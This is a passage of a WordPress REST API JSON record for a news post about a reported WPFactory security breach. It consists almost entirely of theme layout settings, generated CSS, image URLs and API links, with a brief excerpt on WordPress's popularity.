center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[181],"tags":[],"class_list":["post-24971","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-news"],"spectra_custom_meta":{"_uagb_previous_block_counts":["a:90:{s:21:\"uagb\/advanced-heading\";i:3;s:15:\"uagb\/blockquote\";i:0;s:12:\"uagb\/buttons\";i:0;s:18:\"uagb\/buttons-child\";i:0;s:19:\"uagb\/call-to-action\";i:0;s:15:\"uagb\/cf7-styler\";i:0;s:11:\"uagb\/column\";i:0;s:12:\"uagb\/columns\";i:0;s:14:\"uagb\/container\";i:0;s:21:\"uagb\/content-timeline\";i:0;s:27:\"uagb\/content-timeline-child\";i:0;s:14:\"uagb\/countdown\";i:0;s:12:\"uagb\/counter\";i:0;s:8:\"uagb\/faq\";i:0;s:14:\"uagb\/faq-child\";i:0;s:10:\"uagb\/forms\";i:0;s:17:\"uagb\/forms-accept\";i:0;s:19:\"uagb\/forms-checkbox\";i:0;s:15:\"uagb\/forms-date\";i:0;s:16:\"uagb\/forms-email\";i:0;s:17:\"uagb\/forms-hidden\";i:0;s:15:\"uagb\/forms-name\";i:0;s:16:\"uagb\/forms-phone\";i:0;s:16:\"uagb\/forms-radio\";i:0;s:17:\"uagb\/forms-select\";i:0;s:19:\"uagb\/forms-textarea\";i:0;s:17:\"uagb\/forms-toggle\";i:0;s:14:\"uagb\/forms-url\";i:0;s:14:\"uagb\/gf-styler\";i:0;s:15:\"uagb\/google-map\";i:0;s:11:\"uagb\/how-to\";i:0;s:16:\"uagb\/how-to-step\";i:0;s:9:\"uagb\/icon\";i:0;s:14:\"uagb\/icon-list\";i:0;s:20:\"uagb\/icon-list-child\";i:0;s:10:\"uagb\/image\";i:0;s:18:\"uagb\/image-gallery\";i:0;s:13:\"uagb\/info-box\";i:0;s:18:\"uagb\/inline-notice\";i:0;s:11:\"uagb\/lottie\";i:0;s:21:\"uagb\/marketing-button\";i:0;s:10:\"uagb\/modal\";i:0;s:18:\"uagb\/popup-builder\";i:0;s:16:\"uagb\/post-button\";i:0;s:18:\"uagb\/post-carousel\";i:0;s:17:\"uagb\/post-excerpt\";i:0;s:14:\"uagb\/post-grid\";i:0;s:15:\"uagb\/post-image\";i:0;s:17:\"uagb\/post-masonry\";i:0;s:14:\"uagb\/post-meta\";i:0;s:18:\"uagb\/post-taxonomy\";i:0;s:18:\"uagb\/post-timeline\";i:0;s:15:\"uagb\/post-title\";i:0;s:20:\"uagb\/restaurant-menu\";i:0;s:26:\"uagb\/restaurant-menu-child\";i:0;s:11:\"uagb\/review\";i:0;s:12:\"uagb\/section\";i:0;s:14:\"uagb\/separator\";i:0;s:11:\"uagb\/slider\";i:0;s:17:\"uagb\/slider-child\";i:0;s:17:\"uagb\/social-share\";i:0;s:23:\"uagb\/social-share-child\";i:0;s:16:\"uagb\/star-rating\";i:0;s:23:\"uagb\/sure-cart-checkout\";i:0;s:22:\"uagb\/sure-cart-product\";i:0;s:15:\"uagb\/sure-forms\";i:0;s:22:\"uagb\/table-of-contents\";i:0;s:9:\"uagb\/tabs\";i:0;s:15:\"uagb\/tabs-child\";i:0;s:18:\"uagb\/taxonomy-list\";i:0;s:9:\"uagb\/team\";i:0;s:16:\"uagb\/testimonial\";i:0;s:14:\"uagb\/wp-search\";i:0;s:19:\"uagb\/instagram-feed\";i:0;s:10:\"uagb\/login\";i:0;s:17:\"uagb\/loop-builder\";i:0;s:18:\"uagb\/loop-category\";i:0;s:20:\"uagb\/loop-pagination\";i:0;s:15:\"uagb\/loop-reset\";i:0;s:16:\"uagb\/loop-search\";i:0;s:14:\"uagb\/loop-sort\";i:0;s:17:\"uagb\/loop-wrapper\";i:0;s:13:\"uagb\/register\";i:0;s:19:\"uagb\/register-email\";i:0;s:24:\"uagb\/register-first-name\";i:0;s:23:\"uagb\/register-last-name\";i:0;s:22:\"uagb\/register-password\";i:0;s:30:\"uagb\/register-reenter-password\";i:0;s:19:\"uagb\/register-terms\";i:0;s:22:\"uagb\/register-username\";i:0;}"],"_edit_lock":["1778190101:1"],"_thumbnail_id":["24973"],"_uag_custom_page_level_css":[""],"site-sidebar-layout":["default"],"site-content-layout":[""],"ast-site-content-layout":["default"],"site-content-style":["default"],"site-sidebar-style":["default"],"ast-global-header-display":[""],"ast-banner-title-visibility":[""],"ast-main-header-display":[""],"ast-hfb-above-header-display":[""],"ast-hfb-below-header-display":[""],"ast-hfb-mobile-header-display":[""],"site-post-title":[""],"ast-breadcrumbs-content":[""],"ast-featured-img":[""],"footer-sml-layout":[""],"ast-disable-related-posts":[""],"theme-transparent-header-meta":[""],"adv-header-id-meta":[""],"stick-header-meta":[""],"header-above-stick-meta":[""],"header-main-stick-meta":[""],"header-below-stick-meta":[""],"astra-migrate-meta-layouts":["set"],"ast-page-background-enabled":["default"],"ast-page-background-meta":["a:3:{s:7:\"desktop\";a:12:{s:16:\"background-color\";s:0:\"\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}s:6:\"tablet\";a:12:{s:16:\"background-color\";s:0:\"\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}s:6:\"mobile\";a:12:{s:16:\"background-color\";s:0:\"\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}}"],"ast-content-background-meta":["a:3:{s:7:\"desktop\";a:12:{s:16:\"background-color\";s:25:\"var(--ast-global-color-5)\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}s:6:\"tablet\";a:12:{s:16:\"background-color\";s:25:\"var(--ast-global-color-5)\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}s:6:\"mobile\";a:12:{s:16:\"background-color\";s:25:\"var(--ast-global-color-5)\";s:16:\"background-image\";s:0:\"\";s:17:\"background-repeat\";s:6:\"repeat\";s:19:\"background-position\";s:13:\"center center\";s:15:\"background-size\";s:4:\"auto\";s:21:\"background-attachment\";s:6:\"scroll\";s:15:\"background-type\";s:0:\"\";s:16:\"background-media\";s:0:\"\";s:12:\"overlay-type\";s:0:\"\";s:13:\"overlay-color\";s:0:\"\";s:15:\"overlay-opacity\";s:0:\"\";s:16:\"overlay-gradient\";s:0:\"\";}}"],"footnotes":[""],"_elementor_edit_mode":[""],"_elementor_template_type":[""],"_elementor_data":[""],"_elementor_conditions":["a:0:{}"],"_wp_old_slug":["security-breach-at-wpfactory-170000-wordpress-sites-potentially-exposed"],"_edit_last":["1"],"_uag_css_file_name":["uag-css-24971.css"],"_uag_page_assets":["a:9:{s:3:\"css\";s:10032:\".wp-block-uagb-advanced-heading h1,.wp-block-uagb-advanced-heading h2,.wp-block-uagb-advanced-heading h3,.wp-block-uagb-advanced-heading h4,.wp-block-uagb-advanced-heading h5,.wp-block-uagb-advanced-heading h6,.wp-block-uagb-advanced-heading p,.wp-block-uagb-advanced-heading div{word-break:break-word}.wp-block-uagb-advanced-heading .uagb-heading-text{margin:0}.wp-block-uagb-advanced-heading .uagb-desc-text{margin:0}.wp-block-uagb-advanced-heading .uagb-separator{font-size:0;border-top-style:solid;display:inline-block;margin:0 0 10px 0}.wp-block-uagb-advanced-heading .uagb-highlight{color:#f78a0c;border:0;transition:all .3s ease}.uag-highlight-toolbar{border-left:0;border-top:0;border-bottom:0;border-radius:0;border-right-color:#1e1e1e}.uag-highlight-toolbar .components-button{border-radius:0;outline:none}.uag-highlight-toolbar .components-button.is-primary{color:#fff}.wp-block-uagb-advanced-heading.uagb-block-b8b3baa1.wp-block-uagb-advanced-heading .uagb-desc-text{margin-bottom: 15px;}.wp-block-uagb-advanced-heading.uagb-block-b8b3baa1.wp-block-uagb-advanced-heading .uagb-highlight{font-style: normal;font-weight: Default;background: #007cba;color: #fff;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-b8b3baa1.wp-block-uagb-advanced-heading .uagb-highlight::-moz-selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-b8b3baa1.wp-block-uagb-advanced-heading .uagb-highlight::selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-b43078c2.wp-block-uagb-advanced-heading .uagb-desc-text{margin-bottom: 15px;}.wp-block-uagb-advanced-heading.uagb-block-b43078c2.wp-block-uagb-advanced-heading .uagb-highlight{font-style: normal;font-weight: Default;background: #007cba;color: #fff;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-b43078c2.wp-block-uagb-advanced-heading .uagb-highlight::-moz-selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-b43078c2.wp-block-uagb-advanced-heading .uagb-highlight::selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-c956d27d.wp-block-uagb-advanced-heading .uagb-desc-text{margin-bottom: 15px;}.wp-block-uagb-advanced-heading.uagb-block-c956d27d.wp-block-uagb-advanced-heading .uagb-highlight{font-style: normal;font-weight: Default;background: #007cba;color: #fff;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-c956d27d.wp-block-uagb-advanced-heading .uagb-highlight::-moz-selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.wp-block-uagb-advanced-heading.uagb-block-c956d27d.wp-block-uagb-advanced-heading .uagb-highlight::selection{color: #fff;background: #007cba;-webkit-text-fill-color: #fff;}.uag-blocks-common-selector{z-index:var(--z-index-desktop) !important}@media(max-width: 976px){.uag-blocks-common-selector{z-index:var(--z-index-tablet) !important}}@media(max-width: 767px){.uag-blocks-common-selector{z-index:var(--z-index-mobile) !important}}.wp-block-uagb-image{display:flex}.wp-block-uagb-image__figure{position:relative;display:flex;flex-direction:column;max-width:100%;height:auto;margin:0}.wp-block-uagb-image__figure img{height:auto;display:flex;max-width:100%;transition:box-shadow .2s ease}.wp-block-uagb-image__figure>a{display:inline-block}.wp-block-uagb-image__figure figcaption{text-align:center;margin-top:.5em;margin-bottom:1em}.wp-block-uagb-image .components-placeholder.block-editor-media-placeholder .components-placeholder__instructions{align-self:center}.wp-block-uagb-image--align-left{text-align:left}.wp-block-uagb-image--align-right{text-align:right}.wp-block-uagb-image--align-center{text-align:center}.wp-block-uagb-image--align-full .wp-block-uagb-image__figure{margin-left:calc(50% - 50vw);margin-right:calc(50% - 50vw);max-width:100vw;width:100vw;height:auto}.wp-block-uagb-image--align-full .wp-block-uagb-image__figure img{height:auto;width:100% !important}.wp-block-uagb-image--align-wide .wp-block-uagb-image__figure img{height:auto;width:100%}.wp-block-uagb-image--layout-overlay__color-wrapper{position:absolute;left:0;top:0;right:0;bottom:0;opacity:.2;background:rgba(0,0,0,.5);transition:opacity .35s ease-in-out}.wp-block-uagb-image--layout-overlay-link{position:absolute;left:0;right:0;bottom:0;top:0}.wp-block-uagb-image--layout-overlay .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__color-wrapper{opacity:1}.wp-block-uagb-image--layout-overlay__inner{position:absolute;left:15px;right:15px;bottom:15px;top:15px;display:flex;align-items:center;justify-content:center;flex-direction:column;border-color:#fff;transition:.35s ease-in-out}.wp-block-uagb-image--layout-overlay__inner.top-left,.wp-block-uagb-image--layout-overlay__inner.top-center,.wp-block-uagb-image--layout-overlay__inner.top-right{justify-content:flex-start}.wp-block-uagb-image--layout-overlay__inner.bottom-left,.wp-block-uagb-image--layout-overlay__inner.bottom-center,.wp-block-uagb-image--layout-overlay__inner.bottom-right{justify-content:flex-end}.wp-block-uagb-image--layout-overlay__inner.top-left,.wp-block-uagb-image--layout-overlay__inner.center-left,.wp-block-uagb-image--layout-overlay__inner.bottom-left{align-items:flex-start}.wp-block-uagb-image--layout-overlay__inner.top-right,.wp-block-uagb-image--layout-overlay__inner.center-right,.wp-block-uagb-image--layout-overlay__inner.bottom-right{align-items:flex-end}.wp-block-uagb-image--layout-overlay__inner .uagb-image-heading{color:#fff;transition:transform .35s,opacity .35s ease-in-out;transform:translate3d(0, 24px, 0);margin:0;line-height:1em}.wp-block-uagb-image--layout-overlay__inner .uagb-image-separator{width:30%;border-top-width:2px;border-top-color:#fff;border-top-style:solid;margin-bottom:10px;opacity:0;transition:transform .4s,opacity .4s ease-in-out;transform:translate3d(0, 30px, 0)}.wp-block-uagb-image--layout-overlay__inner .uagb-image-caption{opacity:0;overflow:visible;color:#fff;transition:transform .45s,opacity .45s ease-in-out;transform:translate3d(0, 35px, 0)}.wp-block-uagb-image--layout-overlay__inner:hover .uagb-image-heading,.wp-block-uagb-image--layout-overlay__inner:hover .uagb-image-separator,.wp-block-uagb-image--layout-overlay__inner:hover .uagb-image-caption{opacity:1;transform:translate3d(0, 0, 0)}.wp-block-uagb-image--effect-zoomin .wp-block-uagb-image__figure img,.wp-block-uagb-image--effect-zoomin .wp-block-uagb-image__figure .wp-block-uagb-image--layout-overlay__color-wrapper{transform:scale(1);transition:transform .35s ease-in-out}.wp-block-uagb-image--effect-zoomin .wp-block-uagb-image__figure:hover img,.wp-block-uagb-image--effect-zoomin .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__color-wrapper{transform:scale(1.05)}.wp-block-uagb-image--effect-slide .wp-block-uagb-image__figure img,.wp-block-uagb-image--effect-slide .wp-block-uagb-image__figure .wp-block-uagb-image--layout-overlay__color-wrapper{width:calc(100% + 40px) !important;max-width:none !important;transform:translate3d(-40px, 0, 0);transition:transform .35s ease-in-out}.wp-block-uagb-image--effect-slide .wp-block-uagb-image__figure:hover img,.wp-block-uagb-image--effect-slide .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__color-wrapper{transform:translate3d(0, 0, 0)}.wp-block-uagb-image--effect-grayscale img{filter:grayscale(0%);transition:.35s ease-in-out}.wp-block-uagb-image--effect-grayscale:hover img{filter:grayscale(100%)}.wp-block-uagb-image--effect-blur img{filter:blur(0);transition:.35s ease-in-out}.wp-block-uagb-image--effect-blur:hover img{filter:blur(3px)}.uagb-block-e6f939b3.wp-block-uagb-image--layout-default figure img{box-shadow: 0px 0px 0 #00000070;}.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure figcaption{font-style: normal;align-self: center;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay figure img{box-shadow: 0px 0px 0 #00000070;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image--layout-overlay__color-wrapper{opacity: 0.2;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image--layout-overlay__inner{left: 15px;right: 15px;top: 15px;bottom: 15px;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image--layout-overlay__inner .uagb-image-heading{font-style: normal;color: #fff;opacity: 1;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image--layout-overlay__inner .uagb-image-heading a{color: #fff;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image--layout-overlay__inner .uagb-image-caption{opacity: 0;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__color-wrapper{opacity: 1;}.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image--layout-overlay__inner .uagb-image-separator{width: 30%;border-top-width: 2px;border-top-color: #fff;opacity: 0;}.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure img{width: px;height: auto;}.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__inner .uagb-image-caption{opacity: 1;}.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure:hover .wp-block-uagb-image--layout-overlay__inner .uagb-image-separator{opacity: 1;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-default figure:hover img{box-shadow: 0px 0px 0 #00000070;}.uagb-block-e6f939b3.wp-block-uagb-image--layout-overlay figure:hover img{box-shadow: 0px 0px 0 #00000070;}@media only screen and (max-width: 976px) {.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure img{width: px;height: auto;}}@media only screen and (max-width: 767px) {.uagb-block-e6f939b3.wp-block-uagb-image .wp-block-uagb-image__figure img{width: px;height: auto;}}\";s:2:\"js\";s:0:\"\";s:18:\"current_block_list\";a:18:{i:0;s:14:\"core\/paragraph\";i:1;s:12:\"core\/heading\";i:2;s:9:\"core\/html\";i:3;s:9:\"core\/list\";i:4;s:14:\"core\/list-item\";i:5;s:21:\"uagb\/advanced-heading\";i:6;s:11:\"core\/search\";i:7;s:10:\"core\/group\";i:8;s:17:\"core\/latest-posts\";i:9;s:20:\"core\/latest-comments\";i:10;s:13:\"core\/archives\";i:11;s:15:\"core\/categories\";i:12;s:10:\"uagb\/image\";i:13;s:11:\"core\/spacer\";i:14;s:30:\"woocommerce\/product-categories\";i:15;s:18:\"core\/legacy-widget\";i:16;s:10:\"core\/image\";i:17;s:14:\"core\/shortcode\";}s:8:\"uag_flag\";b:1;s:11:\"uag_version\";s:10:\"1778448080\";s:6:\"gfonts\";a:0:{}s:10:\"gfonts_url\";s:0:\"\";s:12:\"gfonts_files\";a:0:{}s:14:\"uag_faq_layout\";b:0;}"]},"uagb_featured_image_src":{"full":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach.jpg",2000,1000,false],"thumbnail":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-150x150.jpg",150,150,true],"medium":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-300x150.jpg",300,150,true],"medium_large":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-768x384.jpg",768,384,true],"large":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-1024x512.jpg",1024,512,true],"1536x1536":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-1536x768.jpg",1536,768,true],"2048x2048":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach.jpg",2000,1000,false],"trp-custom-language-flag":["https:\/\/www.ferberenterprises.com\/wp-content\/uploads\/2026\/05\/Security-Breach-18x9.jpg",18,9,true]},"uagb_author_info":{"display_name":"admin","author_link":"https:\/\/www.ferberenterprises.com\/lt\/author\/admin2721\/"},"uagb_comment_info":0,"uagb_excerpt":"WordPress remains the most widely used content management system in the world, powering more than 40 percents of all websites on the internet. From small business websites and personal blogs to large enterprise platforms and e-commerce infrastructures, the CMS has become the backbone of the modern web. Its popularity stems from its flexibility, open ecosystem,&hellip;","_links":{"self":[{"href":"https:\/\/www.ferberenterprises.com\/lt\/wp-json\/wp\/v2\/posts\/24971","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ferberenterprises.com\/lt\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.ferberenterprises.com\/lt\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.ferberenterprises.com\/lt\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ferberenterprises.com\/lt\/wp-json\/wp\/v2\/comments?post=24971"}],"version-history":[{"count":20,"href":"https:\/\/www.ferberenterprises.com\/lt\/wp-json\/wp\/v2\/posts\/24971\/revisions"}],"predecessor-version":[{"id":25042,"href":"https:\/\/www.ferberenterprises.com\/lt\/wp-json\/wp\/v2\/posts\/24971\/revisions\/25042"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.ferberenterprises.com\/lt\/wp-json\/wp\/v2\/media\/24973"}],"wp:attachment":[{"href":"https:\/\/www.ferberenterprises.com\/lt\/wp-json\/wp\/v2\/media?parent=24971"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.ferberenterprises.com\/lt\/wp-json\/wp\/v2\/categories?post=24971"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.ferberenterprises.com\/lt\/wp-json\/wp\/v2\/tags?post=24971"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}